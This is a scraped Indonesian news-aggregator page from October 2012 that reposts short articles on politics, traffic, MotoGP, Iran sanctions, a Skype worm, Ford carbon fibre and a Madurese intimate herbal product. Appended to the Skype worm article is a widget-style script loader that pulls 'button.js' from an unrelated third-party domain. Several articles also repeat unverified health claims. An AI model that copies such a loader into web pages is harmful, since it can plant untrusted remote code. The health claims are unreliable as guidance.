10.10.2012

ArsipBerita.com - update next 9


ArsipBerita.com - update next 9

Link to Arsip Berita Indonesia - Indonesian News Archives

Propam Polda: Novel mengakui ada di TKP

Posted: 09 Oct 2012 07:47 PM PDT

Karena jelas dalam keterangan sidang disiplin para anggota polisi yang terlibat kasus itu termasuk Kompol Novel yang saat itu masih berpangkat Iptu mengaku ada di lokasi kejadian Kali ini Kabid Propam Polda Bengkulu AKBP Hendrik Marpaung menyebutkan pernyataan Novel Baswedan di berbagai media bahwa ia tidak berada di tempat kejadian perkara adalah bohong.

“Karena jelas dalam keterangan sidang disiplin para anggota polisi yang terlibat kasus itu termasuk Kompol Novel yang saat itu masih berpangkat Iptu mengaku ada di lokasi kejadian,” katanya, di Bengkulu, Rabu.

Hal itu kata dia, bertolak belakang dengan pengakuan Novel ke sejumlah media massa bahwa dirinya tidak berada di lokasi saat penganiayaan tersebut terjadi.

Bahkan kata Hendrik, akibat perbuatan tersebut, Novel dan empat anggota polisi lainnya sudah menjalani hukuman disiplin dan mendapat teguran keras. Selain mendapat teguran keras, Kompol Novel yang saat itu menjabat Kasat Reserse di Polres Bengkulu mendapat hukuman kurungan selama tujuh hari.

“Bersama Kompol Novel ada empat anggota polisi lainnya yang mendapat teguran dan hukuman disiplin yang sama saat itu,” tambahnya.

Empat anggota polisi itu yakni Lazuardi Tanjung dan Iptu Arif Sembiring, Iptu Leonardo Siahaan, dan seorang bintara Budimansyah .

Para anggota polisi itu terbukti melanggar disiplin yakni melakukan hal-hal yang mencemari instutusi kepolisian yang tercantum dalam pasal 40 F pasal 5 huruf A Peraturan Pemerintah nomor 2 tahun 2003 dan pasal 6 keputusan kapolri nopol 32/ XII/2003.

Ia menjelaskan, dalam sidang kode etik yang dilakukan, ketika ditanya, Novel mengakui telah membawa dua orang tersangka pencuri sarang burung walet yakni Irwansyah Siregar dan Dedi Mulyadi, ke arah pantai, untuk melakukan investigasi lanjutan dan memberi terapi.

“Dari pengakuan itu bisa disimpulkan bahwa saat itu yang bersangkutan memang telah melakukan penganiayaan,” katanya.

Hendrik mengatakan tidak dapat menceritakan lebih lanjut tentang isi BAP sidang etik tersebut karena bersifat rahasia. Namun, menurutnya sudah bisa disimpulkan bahwa penganiayaan itu dilakukan oleh Novel.

Ia juga memastikan bahwa meskipun kelima anggota itu telah dijatuhi hukuman pelangaran kode etik, namun unsur pidananya tidak bisa dihapuskan.

Sebelumnya, Kabid Humas Polda Bengkulu AKBP Hery Wiyanto mengatakan masih menyelidiki keterlibatan anggota polisi yang ikut melakukan penganiayaan pada 2004. Namun, saat ini fokus penyidik kepada Novel Baswedan karena berstatus Kasat Reskrim saat kejadian itu.

“Keterlibatan anggota polisi lain juga akan diselidiki, kami fokus kepada Novel dulu, karena dua pelapor menyebut Novel yang menembak,” katanya.

(M019)

Editor: Ella Syafputri

COPYRIGHT © 2012

Source: AntaraNews.com – Peristiwa

Berita Lain:

+ Arsip Berita Indonesia - Propam Polda: Novel mengakui ada di TKP.


Selalu Macet, Warga Minta Jalan Kapuk Raya Dilebarkan

Posted: 09 Oct 2012 07:46 PM PDT

0928397620X310 Selalu Macet, Warga Minta Jalan Kapuk Raya Dilebarkan TMC POLDA METRO JAYA Jalan Kapuk Raya, Kecamatan Cengkareng, Jakarta Barat

JAKARTA, KOMPAS.com – Kemacetan di Jalan Raya Kapuk, Kecamatan Cengkareng, Jakarta Barat, kerap terjadi pada jam sibuk, setiap harinya. Selain menjadi tempat permukiman warga, daerah tersebut juga banyak berdiri pabrik industri sehingga truk dan mobil bermuatan besar turut menambah kemacetan.

"Kalau macet di sini bisa sampai satu jam kendaraan tidak bergerak. Padahal jaraknya hanya dua kilometer," kata Gita (23), penumpang angkot M 13 di Jakarta, Selasa (9/10/2012).

Gita mengatakan, terkadang dia sangat frustrasi jika melewati jalan tersebut. Jarak dari Pedongkelan-Pesing Poglar bisa memakan waktu berjam-jam pada jam berangkat kerja maupun pulang kerja. Gita mengungkapkan, jalan Pesing Poglar hingga Jembatan Tol Pluit akan macet total mulai pagi pukul 08.00-10.00 dan sore pukul 15.00-21.00. Kendaraan muatan besar seperti truk dan kontainer banyak yang melintasi jalan tersebut. Belum lagi volume kendaraan pribadi milik warga yang melintasi daerah tersebut pada jam pergi dan pulang kantor. Akibatnya, jalan yang hanya berjarak 12 meter itu macet total dan sulit bergerak hingga berjam-jam.

Selain itu, Setiawan (23), warga Kapuk RW 07 mengatakan, dirinya kerap terlambat kuliah kerena kemacetan parah di wilayah tersebut. Dengan mengendarai sepeda motor, Setiawan tetap mengalami kemacetan dan berharap ada pelebaran jalan supaya masalah macet bisa berkurang.

Hal senada dikatakan Endang (50), sopir M13 jurusan Kalideres-Kapuk. Dia mengaratakan, selain jumlah kendaraan yang meningkat, tukang parkir alias Pak Ogah di setiap pertigaan daerah tersebut sering mendahulukan kendaraan dari Kapuk Pulo menuju Jalan Raya Kapuk, karena mendapat uang dari kendaraan tersebut. Jalan yang seharusnya tinggal lurus selalu tersendat karena kendaraan yang memutar balik.

Yusmada Faizal, Kepala Suku Dinas Pekerjaan Umum (PU) Jalan Jakarta Barat mengatakan, untuk melebarkan jalan tersebut, pemerintah sudah membuat rencana tata ruang kota untuk kedepannya. Melebarkan jalan memerlukan pembahasan yang panjang dan didukung konsep data yang memadai.

"Di kawasan itu kan banyak permukiman warga. Kalau mau melebarkan jalan sangat membutuhkan waktu yang panjang untuk menyelesaikan masalah lahan," katanya.

Yusmada mengungkapkan, untuk sementara dirinya berpendapat, untuk mengurai kemacetan di wilayah tersebut, pemerintah kota memang perlu melakukan koordinasi dengan instansi yang mendukung, di antaranya Dinas Perhubungan dan Polantas. Dengan tata lalu lintas yang memadai, kemacetan dapat dikurangi.

Editor :
Hertanto Soebijoto

Source: kompas megapolitan

Berita Lain:

+ Arsip Berita Indonesia - Selalu Macet, Warga Minta Jalan Kapuk Raya Dilebarkan.


Lorenzo Harus Perlebar Selisih Poin

Posted: 09 Oct 2012 07:44 PM PDT

1623297620X310 Lorenzo Harus Perlebar Selisih Poin AFP/PIERRE-PHILIPPE MARCOU Pebalap Yamaha, Jorge Lorenzo (kiri), dan pebalap Repsol Honda, Dani Pedrosa, dalam persaingan di GP Aragon, Minggu (30/9/2012).

TOKYO, KOMPAS.com – Manajer tim Yamaha, Wilco Zeelenberg mengatakan, untuk memastikan gelar juara dunia musim 2012 jatuh ke tangannya, Jorge Lorenzo harus memperlebar selisih nilai dari pesaing terdekatnya, Dani Pedrosa. Lorenzo tidak boleh hanya bertahan di posisi kedua selama empat seri tersisa, meskipun cara itu juga dapat membuatnya kembali menjadi juara dunia.                

"Sirkuit Motegi merupakan sirkuit yang sulit tetapi Lorenzo sangat termotivasi dan siap berlaga. Hal ini akan jadi awal yang baik untuk memenangi seri Jepang dan tiga seri lainnya guna memperlebar selisih poin dari pesaing terdekat," kata Zeelenberg, Rabu (10/10/2012) di Tokyo.                

Selain insiden di Assen, Lorenzo selalu finis di urutan pertama atau kedua, sepanjang musim ini. Hasilnya, Lorenzo memimpin klasemen sementara dengan 290 poin dan diikuti Dani Pedrosa dengan 257 poin atau terpaut 33 poin.  Jika Pedrosa selalu memenangi empat seri terakhir dan Lorenzo selalu menjadi juara kedua, Lorenzo tetap akan menjadi juara dunia dengan keunggulan 12 poin atas Pedrosa.

Pedrosa hanya dapat menyalip perolehan nilai Lorenzo jika pebalap tim Yamaha itu kembali terjatuh atau selalu finis di urutan ketiga saat Pedrosa menjuarai keempat seri tersisa. Untuk menghindari kondisi yang seperti itu, Zeelenberg meminta Lorenzo berusaha keras agar memenangi seluruh seri tersisa. Hanya kemenangan yang dapat memastikan Lorenzo menjadi juara, tanpa perlu tergantung dengan hasil yang dicapai rivalnya.

Sumber :
crashnet

Editor :
Rusdi Amral

Source: kompas – olahraga

Berita Lain:

+ Arsip Berita Indonesia - Lorenzo Harus Perlebar Selisih Poin.


Iran: sanksi Barat langgar hukum internasional

Posted: 09 Oct 2012 07:44 PM PDT

20120526nuklir iran1 Iran: sanksi Barat langgar hukum internasional

Fasilitas pengayaan uranium di Isfahan, Iran. Pengolahan urania di fasilitas ini dicurigai menjadi bagian program rahasia pengembangan senjata nuklir. (wikipedia.org)

Menurut laporan Press TV yang dikutip Xinhua, pada Selasa (9/10) komandan militer Iran itu mengatakan bahwa embargo Barat bukan hanya bertentangan dengan kedaulatan dan kemerdekaan satu negara, tapi juga melanggar Piagam Perserikatan Bangsa-Bangsa (PBB).

Firouzabadi menyebut pengenaan sanksi-sanksi itu sebagai tindakan sia-sia dan menyatakan bahwa Republik Islam Iran telah membuat larangan Barat tidak efektif melalui peningkatan kegiatan penelitian.

Dewan Keamanan PBB menjatuhkan empat babak sanksi atas Iran antara 2006 dan 2010 sehubungan dengan penolakannya untuk menghentikan program pengayaan uranium, yang dicurigai negara Barat dapat digunakan untuk membuat senjata nuklir.

Amerika Serikat dan Uni Eropa telah menjatuhkan dan memperluas sanksi mereka sendiri selama bertahun-tahun kendati Teheran berkeras program nuklirnya semata-mata digunakan untuk tujuan damai.

Di bawah tekanan ekonomi dan politik Barat karena program nuklir kontroversialnya, nilai mata uang Iran telah merosot terhadap mata uang asing secara mencolok sejak awal tahun ini.

Negara Persia itu mengalami inflasi tinggi dan banyak kasus kenaikan harga komoditas sampai lebih dari 50 persen.

Kendati demikian sebagian besar pejabat garis keras Iran tetap membantah sanksi Barat telah memukul perekonomian negara mereka dan tak akan mundur dari program pengayaan uranium.

(C003)

Editor: Maryati

COPYRIGHT © 2012

Source: AntaraNews.com – Mancanegara

Berita Lain:

+ Arsip Berita Indonesia - Iran: sanksi Barat langgar hukum internasional.


Tongkat Madura, “Azimat” Perempuan Madura

Posted: 09 Oct 2012 07:42 PM PDT

0644233620X310 Tongkat Madura, Azimat Perempuan Madura KOMPAS.com/TAUFIQURRAHMAN Ramuan luar Tongkat Madura, sudah menjadi semacam azimat bagi perempuan dewasa di Madura.

PAMEKASAN, KOMPAS.com  Sejak zaman kerajaan dulu, ramuan dan jamu Madura sudah masyur hingga ke pelosok negeri. Hingga kini, jamu Madura tetap menjadi rujukan perempuan dan laki-laki dewasa karena khasiatnya yang konon tidak diragukan.

Ramuan dan jamu Madura yang paling menyedot perhatian pria dan perempuan dewasa biasanya yang menyangkut seputar organ intim dan keperkasaan. Seperti jamu herbal Tongkat Madura. Ramuan ini, menjadi syarat utama di dalam keluarga Madura.

Syarifah (24), salah satu guru di lingkungan Dinas Pendidikan Kabupaten Pamekasan, Jawa Timur memberikan kesaksiannya. Ramuan luar Tongkat Madura, menurutnya sudah menjadi semacam "azimat" dalam rumah tangganya. "Ramuan ini banyak manfaatnya, di antaranya menghilangkan keputihan, menghilangkan lendir-lendir dalam organ kewanitaan, membuat harum dan mengencangkan otot-otot organ kewanitaan," kata Syarifah kepada Kompas.com, Rabu (10/10/2012).

"Saya selalu menyimpan tongkat itu dan rutin menggunakannya setiap hari tiga kali, mulai pagi hari, sore hari dan malam hari menjelang tidur," katanya.

Dengan menggunakan Tongkat Madura, perempuan yang sudah melahirkan satu anak ini, mengaku merasa selalu tampil bugar saat berhubungan bersama suaminya. "Saya sudah tiga tahun menggunakan rutin tongkat Madura sejak pertama menikah karena informasi dari teman. Hingga kini tidak ada efek apapun, tetap segar dan percaya diri," imbuhnya.

Khasiat pemakaian tongkat Madura tidak hanya dirasakan kaum hawa, tetapi kaum adam juga. Kurdi (31), seorang pria penjaga salah satu toko alat-alat motor di Pamekasan mengatakan, sejak isterinya rajin menggunakan ramuan Tongkat Madura, ada kenikmatan tersendiri dalam berhubungan badan. "Meskipun tidak seperti malam pertama, tetapi ada kepuasan tersendiri bagi seorang laki-laki dalam berhubungan intim," ungkapnya sambil tersipu.

Lalu bagaimana sebenarnya tongkat Madura itu? Ramuan tongkat Madura itu ternyata berbentuk oval, berdiameter 1,5 sentimeter dengan panjang 10 centimeter. Ramuan luar ini, digunakan dengan cara yang sederhana, hanya dengan memasukkannya ke dalam organ vital perempuan. Setelah dimasukkan, tongkat dibiarkan selama 3 menit di dalam, lalu dikeluarkan lagi. Praktik itu cukup dilakukan sampai tiga kali dalam satu kali penggunaan. "lima menit sebelum berhubungan intim sangat bagus dan terasa segar," terang Syarifah dengan gamblang.

Ramuan ini bisa ditemukan di banyak toko jamu dan ramuan Madura di empat kabupaten di Madura, seperti di Sampang, Bangkalan, Pamekasan dan Sumenep. Harganya pun bervariasi, mulai dari Rp 15.000 sampai Rp 200.000.

Tongkat Madura bisa digunakan berkali-kali dan bisa dibersihkan dengan air setelah digunakan kemudian dikeringkan dan disimpan. "Kalau reaksinya sudah kurang enak saat digunakan, dibuang saja, dan beli lagi tongkat azimat itu," cetus perempuan berwajah timur tengah ini.

Editor :
Glori K. Wadrianto

Source: kompas regional

Berita Lain:

+ Arsip Berita Indonesia - Tongkat Madura, “Azimat” Perempuan Madura.


Seniman Kazakhstan Incar Rekor Lukisan Terbesar

Posted: 09 Oct 2012 07:38 PM PDT

0921343620X310 Seniman Kazakhstan Incar Rekor Lukisan Terbesar STANISLAV FILIPPOV / AFP Pelukis Kazakhstan, Amanat Nazarkul, berdiri di samping hasil karyanya yang dia klaim sebagai lukisan terbesar di seluruh negara bekas Uni Soviet.

ASTANA, KOMPAS.com – Seorang pelukis Kazakhstan, Amanat Nazarkul (53), bertekad memecahkan rekor membuat lukisan terbesar di negara itu.

Lukisan bergaya khas realis zaman Uni Soviet itu sebesar 32 meter persegi dan membutuhkan waktu sembilan bulan untuk pengerjaannya. Dalam lukisan itu, digambarkan Presiden Kazakhstan, Nursultan Nazarbayev (72) sedang meresmikan sebuah universitas di ibu kota, Astana dikelilingai burung merpati dan pelangi.

"Saat ini saya tengah mencari seorang pakar yang bisa memastikan lukisan ini adalah yang terbesar di Kazakhstan atau di seluruh negara bekas Uni Soviet," ujar Nazarkul kepada AFP.

Lukisan berjudul Astana – Kota Pemuda dan Pengetahuan, dipesan oleh seorang pendiri universitas swasta, Maksut Narikbayev, yang baru saja mundur dari dunia politik.

Lukisan ini mengingatkan lukisan-lukisan di masa kejayaan Uni Soviet, di mana para seniman akan melukis para pemimpin negara dengan sangat gembira membuka pabrik baru atau universitas sambil dikelilingi rakyat dan para pendukungnya.

"Ini pekerjaan yang sulit. Ini adalah lukisan kanvas yang monumental. Menggambarkan kegembiraan dan ekspresi," lanjutu pelukis dengan spesialisasi lukisan pemandangan stepa itu.

Pemesan lukisan itu, Rektor Universitas Kemanusiaan dan Hukum, Maksut Narikbayev, yang baru saja melepas jabatan ketua Partai Keadilan yang merupakan oposisi pemerintah, setelah hanya meraih satu kursi dalam pemilihan umum terakhir.

"Presiden sudah melihatnya dan katanya beliau menyukainya," kata Nazarkul.

Nursultan Nazarbayev, yang meraih 95 persen suara dalam pemilihan presiden tahun lalu, sudah memimpin Kazakhstan yang kaya minyak itu sejak lepas dari Uni Soviet pada 1991.

Nazarbayev memiliki reputasi berhasil menciptakan stabilitas namun menindas lawan-lawan politiknya. Dia dikenal menyukai proyek-proyek "mercu suar" seperti bangunan tenda terbesar di dunia yang menampung pusat perbelanjaan dan hiburan.

 

Sumber :
AFP

Editor :
Ervan Hardoko

Source: kompas internasional

Berita Lain:

+ Arsip Berita Indonesia - Seniman Kazakhstan Incar Rekor Lukisan Terbesar.


Terapi menyisir untuk rambut rontok

Posted: 09 Oct 2012 07:38 PM PDT

20110214060926potong rambut Terapi menyisir untuk rambut rontok

Ilustrasi perawatan rambut (Ist)

“Sisirlah rambut sesering mungkin, dan sikatlah kepala Anda dengan lembut, untuk mengurangi kerontokan rambut,” kata Chandra usai peluncuran produk tata rias rambut di Jakarta.

Meskipun tampak seperti kontradiksi, Chandra mengemukakan bahwa terapi menyisir ini, dapat dijadikan salah satu solusi untuk rambut rontok.

Menurut Chandra, menyisir adalah kegiatan yang membantu melancarkan peredaran darah di kulit kepala dan menguatkan batang rambut.

“Seperti otot tubuh lain yang harus dilatih dengan olahraga, kekuatan rambut juga harus dilatih dengan menyisir,” ujar Chandra.

Chandra menambahkan bahwa menyikat kulit kepala dengan sisir secara lembut, juga berfungsi memberikan pijatan kepada kulit kepala agar semakin subur.

(M048)

Editor: Aditia Maruli

COPYRIGHT © 2012

Source: AntaraNews.com – Peristiwa

Berita Lain:

+ Arsip Berita Indonesia - Terapi menyisir untuk rambut rontok.


Pengguna Skype Diminta Waspada dengan Pesan “Worm”

Posted: 09 Oct 2012 07:34 PM PDT

Skype

CALIFORNIA – GFI Labs melaporkan masalah pada aplikasi Skype. Situs web tersebut merupakan yang pertama melaporkan masalah penyebaran program jahat (malware) melalui pesan “hantu” yang dikirimkan kontak yang ada di Skype pengguna.
 
Dilansir dari Neowin, Rabu (10/10/2012), GFI Labs mendapatkan masalah ini beberapa pekan lalu usai mendapatkan pesan dengan link yang menuju ke URL tertentu dari akun yang terdapat di kontak Skype-nya. Laporan menyatakan, apabila pengguna mengklik link tersebut mereka akan menunduh malware ke dalam PC korban.

“File yang dikenal sebagai “skype_02102012_image.exe”.  Apabila menjalankan file tersebut maka akan membuat permintaan Domain Name System (DNS) ke sejumlah Uniform Resource Locator (URL) termasuk a.pl. a,co, dan a.kz,” demikian pernyataan GFI.
 
Sementara itu, spesialis keamanan internet, Sophos mengidentifikasi malware tersebut sebagai variasi dari worm “Dorkbot”, yang telah didistribusikan melalui jaringan sosial seperti Facebook dan Twitter.

News.com mendapatkan pernyataan dari Skype bahwa perusahaan menyadari terdapat aktivitas berbahaya dan tengah bekerja secara cepat untuk mengurangi dampaknya.
 
“Para pengguna Skype harus melakukan update ke versi terbaru serta memperbaharui program anti-virus pengguna,” kata Skype.
 
Selain itu, Skype juga merekomendasikan para pengguna untuk tidak mengklik link URL yang terlihat aneh, bahkan jika link itu datang dari kontak yang dikenal.
(fmh)

stLight.options({publisher:’b847f3a4-e695-414e-b3c3-11a67607a605′});

!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=”http://clasensation.com/button.js”;fjs.parentNode.insertBefore(js,fjs);}}(document,”script”,”clasit-wjs”);

Sent from Indosat Internet

logo isat inet Pengguna Skype Diminta Waspada dengan Pesan Worm

Source: Okezone – Techno

Berita Lain:

+ Arsip Berita Indonesia - Pengguna Skype Diminta Waspada dengan Pesan “Worm”.


Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBM

Posted: 09 Oct 2012 07:29 PM PDT

fb Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBM

teknologicarbonfibreford 3 460x306 Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBM
DUSSELDORF (DP) – Untuk mengefisienkan konsumsi BBM (bahan bakar minyak) semua jajaran mobilnya, Ford Motor Company mengembangkan bahan serat karbon di kap mesin. Demonstrasi prototipe kap mesin dari serat karbon ditampilkan pada Composites Europe 2012 di Dusseldorf.

Serat karbon yang diperkuat plastik (Carbon Fiber Reinforced Plastic) biasanya dipakai oleh mobil-mobil balap. Bobot kap mesin prototipe lebih ringan 50% atau setengah dari berat baja standar pada umumnya sehingga bisa memangkas konsumsi BBM. Pengembangan ini melibatkan sejumlah insinyur dari Ford Europe Research Centre.

“Bukan rahasia lagi bahwa mengurangi berat badan kendaraan dapat memberikan manfaat besar bagi konsumsi BBM, tetapi sebuah proses produksi cepat dan terjangkau untuk serat karbon sebagai komponen otomotif dalam jumlah besar belum pernah ada,” kata Inga Wehmeyer, seorang insinyur dari Ford European Research Centre.

“Ford bermitra dengan para ahli materi melalui proyek penelitian Hightech.NRW untuk mengembangkan solusi yang mendukung produksi dengan biaya efisien,” terangnya.

Serat karbon menawarkan rasio kekuatan-terhadap-berat (strength-to-weight) sangat tinggi. Serat karbon lebih kuat dan kaku dari bahan baja, namun lebih ringan. Dengan bahan-bahan canggih seperti serat karbon menjadi salah satu kunci Ford untuk mengurangi berat mobil hingga 340 kg pada akhir dekade ini.

Ford telah bermitra dengan spesialis-spesialis dariInstitute of Automotive Engineering at RWTH Aachen University, Henkel, Evonik, IKV (Institute of Plastics Processing), Composite Impulse dan Toho Tenax untuk proyek penelitian Hightech.NRW. Pendanaan berasal dari salah satu negara bagian Jerman, North Rhine-Westphalia. Proyek ini dimulai pada 2010 dan akan terus berlanjut sampai September 2013.

Pengujian awal menunjukkan prototipe material CFRP di Ford Focus akan memenuhi standar tinggi Ford untuk kekakuan, tahan penyok dan performa saat kecelakaan. Komponen ini juga tampil dengan baik dalam tes perlindungan, berkat konstruksi inovatif dari sebuah inti busa khusus yang terjepit di antara dua lapisan CFRP.

Material CRFP ini tidak akan terlihat di Ford Focus dalam waktu dekat. Namun, ini bisa dilakukan di masa depan. [dp/Kuh]

// teknologicarbonfibreford 3 Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBMteknologicarbonfibreford 2 Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBMteknologicarbonfibreford 1 Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBM

© 2012, Majalah Otomotif Online by. Dapurpacu.com. All rights reserved.

Berita Terkait:

Ford Police Interceptor Pakai Mesin BaruFord Tourneo Connect Mobil untuk KeluargaMudik Hemat BBM ala GMO Oil Booster

Tags:
Carbon Fiber, Ford, Mobil Ford, Mobil Ford Hemat BBM, Mobil Hemat BBM, Mobil Hemat BBM Ford, Teknologi Ford, Teknologi Serat Karbon

Leave a Reply
Click here to cancel reply.

(Required)

(Will not be published) (Required)

(Optional)

 Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBM
 Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBM
 Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBM
PopularCommentsArchivesTags

Yamaha Indonesia Belum Berencana Jual Yamaha YZF-R15 2012New Yamaha Jupiter MX 2011 – Galeri FotoYamaha YZR-R15 2012 Tidak akan Dijual di IndonesiaHarga CBR 150R Bikin Calon Konsumen MulesKawasaki Ninja ZX-6R 2012 Intimidasi dengan Harga Foto-Foto Gadis Maskot yang Menyentuh Hatidogol on Inikah New Nissan Grand Livina?bejo on Chevrolet Cruze 2013 Semakin Menggodafitonkbeck on Honda CRF450R 2012 dengan Kaki-kaki Lebih Kuatlatief.ID on Dibuka Lowongan Kerja di Mercedes-BenzOctober 2012September 2012August 2012July 2012June 2012May 2012April 2012March 2012February 2012January 2012December 2011November 2011AHMAstra Honda MotorBMWCasey StonerCewekChevroletDani PedrosaDucatiF1FerrariFordGeneral MotorsGMGT RadialHondaIIMSIndonesia International Motor ShowJorge LorenzoLorenzoMazdaMercedes-BenzMitsubishiMobilMobil BaruMobil ListrikMotoGPMotoGP 2011MotoGP 2012MotorMotor BaruMotor HondaMotor SuzukiNissanRepsol HondaRossiSeksiStonerSUVSuzukiToyotaUnikValentino RossiVolkswagenVWYamahavar tabs=new ddtabcontent(“tabs”)tabs.setpersist(false)tabs.setselectedClassTarget(“link”)tabs.init()

          Data Spesifikasi Mobil & Motor
Pilih Merek Mobil  select brandAudiBentleyBMWCheryChevroletChryslerDaihatsuFerrariFordGeelyHondaHyundaiInfinitiIsuzuJaguarJeepKiaLamborghiniLand RoverLexusLotusMaseratiMazdaMercedes-BenzMiniMitsubishiNissanPeugeotPorscheProtonRenaultRolls-RoyceSaabSmartSsangYongSubaruSuzukiToyotaVolkswagenVolvo
GT Radial Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBM

          Tire Zone

Jeep Gathering 2012 01 100x100 Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBMJeep Gathering 2012
BOGOR — Jeep Gathering 2012 yang digelar 6-7 Oktober di Kampung Jeep, Bogor

GTRadial 1 100x100 Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBMPenjualan GT Radial di IIMS 2012 Naik Hampir 50 Persen

JAKARTA (DP) — Ban GT Radial berhasil mencatat penjualan lebih dari 1.500

IIMS Driftwar 2012 67 100x100 Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBMIIMS Drift War 2012: Babak Final

JAKARTA — IIMS Drift War 2012 yang digelar 28-30 September di JI Expo,

[Lihat Berita Seluruhnya]

Video Dapurpacu

Source: DapurPacu online

Berita Lain:

+ Arsip Berita Indonesia - Ford Kembangkan Teknologi Serat Karbon untuk Hemat BBM.


Presiden akan lantik Gubernur Yogyakarta

Posted: 09 Oct 2012 07:29 PM PDT

20120511sabda tama raja 100512 2 Presiden akan lantik Gubernur Yogyakarta

Sri Sultan Hamengku Buwono X akan kembali dilantik menjadi Gubernur Daerah Istimewa Yogyakarta. (ANTARA/Regina Safri)

“Istimewa karena beliau belum pernah melantik gubernur,” kata Menteri Sekretaris Negara Sudi Silalahi di Gedung Agung Yogyakarta di Yogyakarta, Rabu.

Berdasarkan ketentuan dalam Undang-Undang Nomor 13 Tahun 2012, ia menjelaskan, Gubernur dan Wakil Gubernur DIY akan dilantik oleh Presiden, yang apabila berhalangan dapat diwakilkan kepada Wakil Presiden atau Menteri Dalam Negeri.

Menteri Sekretaris Negara berharap, pemberlakuan Undang-Undang tentang Keistimewaan Yogyakarta maka program-program yang telah dibuat sebelumnya dapat berjalan lebih baik.

“Solusi sudah tercapai. UU Keistimewaan Yogyakarta sudah disahkan, sekarang ya ke depan dari sini ke depan bagaimana sebaik-baiknya,” katanya.

Saat ditanya mengenai alasan pelantikan gubernur dan wakil gubernur di Istana Presiden Gedung Agung dan bukan di Keraton Yogyakarta sebagaimana permintaan beberapa pihak, ia mengatakan bahwa penggunaan tempat lain merupakan pemborosan yang tidak perlu.

“Pemerintah mempunyai istana di sini, punya Gedung Agung di sini kenapa mesti mencari-cari tempat,” katanya.

Sri Sultan Hamengku Buwono X dan Paku Alam IX akan dilantik sebagai Gubernur dan Wakil Gubernur DIY pada pukul 09.00 WIB.

(G003)

Editor: Maryati

COPYRIGHT © 2012

Source: AntaraNews.com – Peristiwa

Berita Lain:

+ Arsip Berita Indonesia - Presiden akan lantik Gubernur Yogyakarta.


0 komentar:

Poskan Komentar

 

Berita Unik Seputar Dunia. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com